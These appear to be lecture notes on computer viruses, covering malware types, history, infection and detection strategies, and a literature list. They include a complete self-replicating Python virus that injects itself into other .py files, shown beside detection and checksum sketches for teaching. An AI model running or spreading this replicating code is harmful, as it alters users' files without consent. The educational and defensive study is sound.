Friday Learning Session, Aug 17, 2018 (for comments: hunan131@gmail.com)
- definition of 'computer virus'
- difference between viruses and other forms of malware
- brief history
- late 80s, mainly targeting DOS and derivatives
- Cohen proves a number of theoretical results
- components of a virus and demo
- infection strategies
- prepending, appending, cavity
- compressing
- evolving: monomorphic, polymorphic (encrypting)
- direct-action vs resident
- detection strategies
- traditional: scanning, monitoring
- machine-learning
- advice
- keep stuff up to date
- don't trust binaries (OSS)
- don't curl and shell random scripts
- literature
A computer virus is any program that makes a copy of itself using other programs. The copy doesn't have to be an exact one. As we'll see, there are viruses that infect their hosts with modified copies of themselves.
Viruses are often confused with other kinds of malware, such as worms, trojan horses, backdoors, and logic bombs. Let's look at the main types (for a more detailed list, see Szor 2005, §2.3).
- virus: a program that copies itself using other programs
- worm: a program that duplicates itself, usually over a network
- mailer: a worm that spreads through email attachments
- trojan horse: a useful program that has additional, malicious functionality (e.g. a word processor program that periodically sends your text to its creator)
- backdoor: a program that allows a hidden or undocumented access to a system resource
- keylogger: a program that logs keystrokes and sends them (streamed or in batches) to the attacker
- rootkit: a set of utilities installed or used by malware after infiltration (user- vs kernel-level)
- dropper: a program that installs a virus (subtype: injectors target RAM)
- flooder: a program that participates in a denial-of-service (DoS) attack
- The idea of self-replicating machines occurs to John von Neumann
- Cohen 1984 -- coins the term "computer virus"; first proofs and demos
- CCC 1987 -- congress on viruses ("I curse the day I bought a hard drive")
- late 80s -- first computer viruses appear in the wild
- 1988 -- Morris worm
- skip to 2010 -- Stuxnet
- these days -- cryptoviruses
Please do not run this. For demonstration purposes only.
#..^..START..^..
import os
SIGNATURE = '#..^..VI..^..'
START, END = '#..^..START..^..', '#..^..END..^..'
def interesting(path):
if path.split('.')[-1] == 'py':
return True
def infected(path):
with open(path) as fp:
for line in fp:
line = line.strip()
if SIGNATURE == line:
return True
return False
def search():
for path in os.listdir('.'):
if os.path.isfile(path) and interesting(path) and not infected(path):
return path
def copy(fp):
with open(__file__) as fp2:
started = False
for line in fp2:
if line.strip() == START:
started = True
else:
if not started:
continue
if line.strip() == END:
fp.write(END + '\n')
break
fp.write(line)
fp.write('\n')
def infect(candidate):
# read contents and fix the signature index
with open(candidate) as fp:
old, index = [], 0
for i, line in enumerate(fp):
index += int(line.startswith('#'))
old.append(line)
# re-write the contents, prepending the signature and injecting code
with open(candidate, 'w') as fp:
if not old:
copy(fp)
for i, line in enumerate(old):
# add signature & copy self
if i == index:
fp.write(SIGNATURE + '\n')
copy(fp)
# write the rest of the original file
fp.write(line)
def trigger():
return True # if some condition holds
def damage():
print('Might want to install an anti-virus')
def main():
candidate = search()
# if candidate found, we infect, otherwise nothing to do.
if candidate:
infect(candidate)
print(candidate + ' has been infected')
# if conditions are met, we do some damage
if trigger():
damage()
main()
#..^..END..^..
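Because the demo marks every file it touches with a fixed signature line, the simplest possible scanner just looks for that line. The following is a minimal sketch, assuming the same `SIGNATURE` value as the demo; the helper names `is_marked` and `find_marked` are made up for illustration and are not part of the demo itself.

```python
import os

# Marker line the demo writes into every file it infects.
SIGNATURE = '#..^..VI..^..'

def is_marked(path):
    """Return True if any line of the file equals the demo's marker."""
    with open(path, errors='replace') as fp:
        return any(line.strip() == SIGNATURE for line in fp)

def find_marked(directory='.'):
    """List the .py files in `directory` that carry the marker."""
    hits = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and name.endswith('.py') and is_marked(path):
            hits.append(path)
    return hits

if __name__ == '__main__':
    for path in find_marked('.'):
        print(path + ' carries the demo signature')
```

This only works because the marker never changes. A virus that alters its own code from one infection to the next leaves no fixed line to search for.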
Most malware these days seems to be either trojan horses, backdoors, or ransomware. Decades of back and forth between virus and antivirus writers have helped develop systems on which the classic viruses are very difficult to run. What we discuss here is mainly of historical and conceptual interest, not necessarily something you can write and deploy on a modern machine.
The example virus we looked at is a direct-action virus: it targets other programs and spreads when they're executed. A much more dangerous class of viruses targets not programs, but processes! In an operating system without proper process isolation (such as DOS, MS-DOS, or CP/M), a memory-resident virus is injected into a shared region of RAM. From there it can hook the interrupt vector table (think of this as installing a package as Express or Flask middleware) and wait for other processes to run. When they do, they make system resource requests via interrupts/syscalls. Before reaching the operating system, these requests pass through the virus, which can use the opportunity to do all sorts of damage.
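To make the middleware analogy concrete, here is a toy simulation of hooking in plain Python. It is only a sketch: the "vector table" is a dictionary, and `os_file_service`, `interrupt`, and `install_hook` are made-up names. Nothing here touches a real interrupt table; the number 0x21 is borrowed from the DOS services interrupt purely as a label.

```python
# Toy model of a vector table: interrupt number -> handler function.
# All names here are illustrative; no real system tables are involved.
def os_file_service(request):
    return 'OS handled ' + request

vector_table = {0x21: os_file_service}

def interrupt(number, request):
    """What a process does when it asks the system for something."""
    return vector_table[number](request)

seen = []  # requests observed by the hook

def install_hook(number):
    """Replace a table entry with a wrapper that chains to the original."""
    original = vector_table[number]

    def hooked(request):
        seen.append(request)       # the hook sees the request first
        return original(request)   # then passes it on unchanged

    vector_table[number] = hooked

install_hook(0x21)
print(interrupt(0x21, 'open report.txt'))  # prints "OS handled open report.txt"
print(seen)                                # prints "['open report.txt']"
```

The caller gets the same answer as before, which is why hooks are hard to notice from the outside. The flip side is that a monitor can detect one by checking whether the table entries still point at the handlers it expects.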
- boot sector: target boot sectors of devices, so that the virus runs before the operating system has time to put the proper protection in place
- overwriters, prependers, appenders, amoebas
- entry-point obscuring (EPO): randomly choose location of virus; jump to it
- cavity: exploit empty spaces in program
- embedded decryptor: cut parts of program code out, replace with sharded decryptor, jump to first shard, decrypt virus, put cut-out pieces back, jump to start
- compressors: as obfuscation, as payload
- metamorphic: change code during infection using non-cryptographic means
- polymorphic: change code during infection using cryptographic means
- scanning: checksum binaries, especially important ones, like terminals/shells
- monitoring: system calls, number of threads, cpu and disk usage, etc.
- machine-learning approach: treats virus detection as a supervised classification problem
- features are: location, filenames, sizes, system call profile, number of threads used, etc.
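The checksum idea behind scanning can be sketched in a few lines: record a hash for each important file while the system is known to be clean, then compare later. This is a minimal sketch using SHA-256 from the standard library; the helper names `sha256_of`, `snapshot`, and `changed` are made up for illustration, and the choice of which files to watch is left to the reader.

```python
import hashlib

def sha256_of(path, chunk_size=65536):
    """Hash a file in chunks so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, 'rb') as fp:
        for chunk in iter(lambda: fp.read(chunk_size), b''):
            digest.update(chunk)
    return digest.hexdigest()

def snapshot(paths):
    """Record a baseline: path -> checksum, taken while the files are trusted."""
    return {path: sha256_of(path) for path in paths}

def changed(baseline):
    """Return the paths whose current checksum differs from the baseline."""
    return [path for path, old in baseline.items() if sha256_of(path) != old]
```

A typical use is to call `snapshot` on a list of shells and other critical binaries, store the result somewhere malware cannot rewrite it, and run `changed` periodically. The sketch assumes the files still exist when rechecked; a deleted file raises an error instead of being reported.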
- Bontchev (1991) "The Bulgarian and Soviet Virus Writing Factories"
- Good historical article. I found it inspiring thirteen years ago.
- Burger (1991) Computer Viruses and Data Protection
- Outdated. Mostly focuses on DOS and CP/M operating systems. Has nice lists of virus signatures and interrupts. Burger is not a fan of Cohen's theoretical work, so don't take what he says about Cohen too seriously.
- Cohen (1984) "Computer Viruses - Theory and Experiments"
- This is the work that established computer virology as a field of study within computer science. Cohen coins the term "computer virus" in this work. It's full of theoretical and practical insights.
- Filiol (2005) Computer Viruses. From Theory to Applications
- Excellent "textbook" on viruses and malware. Filiol doesn't shy away from theory, but the book also contains lots of practical advice. Covers the history before and after Cohen.
- Goodrich, Tamassia (2014) Introduction to Computer Security
- There's a very brief overview of malware in this classic textbook.
- Ludwig (1991) The Little Black Book of Computer Viruses
- Ludwig's "Black Books" are classics of the genre. He provides actual virus source code as appendices! He has been an inspiration to me for defending our right to understand, analyze, and create (in controlled environments) viruses.
- Ludwig (1995) The Giant Black Book of Computer Viruses
- Richardson (2009) "Virus detection with machine learning"
- PhD thesis dedicated to casting and solving virus detection as a supervised classification problem.
- Szor (2005) The Art of Computer Virus Research and Defense
- This is a (now pretty outdated) classic in the antivirus community. Written by one of the lead security experts at Symantec. Section 4.3 goes deep into Windows 95 viruses. Nothing of use to a unix/linux virus writer.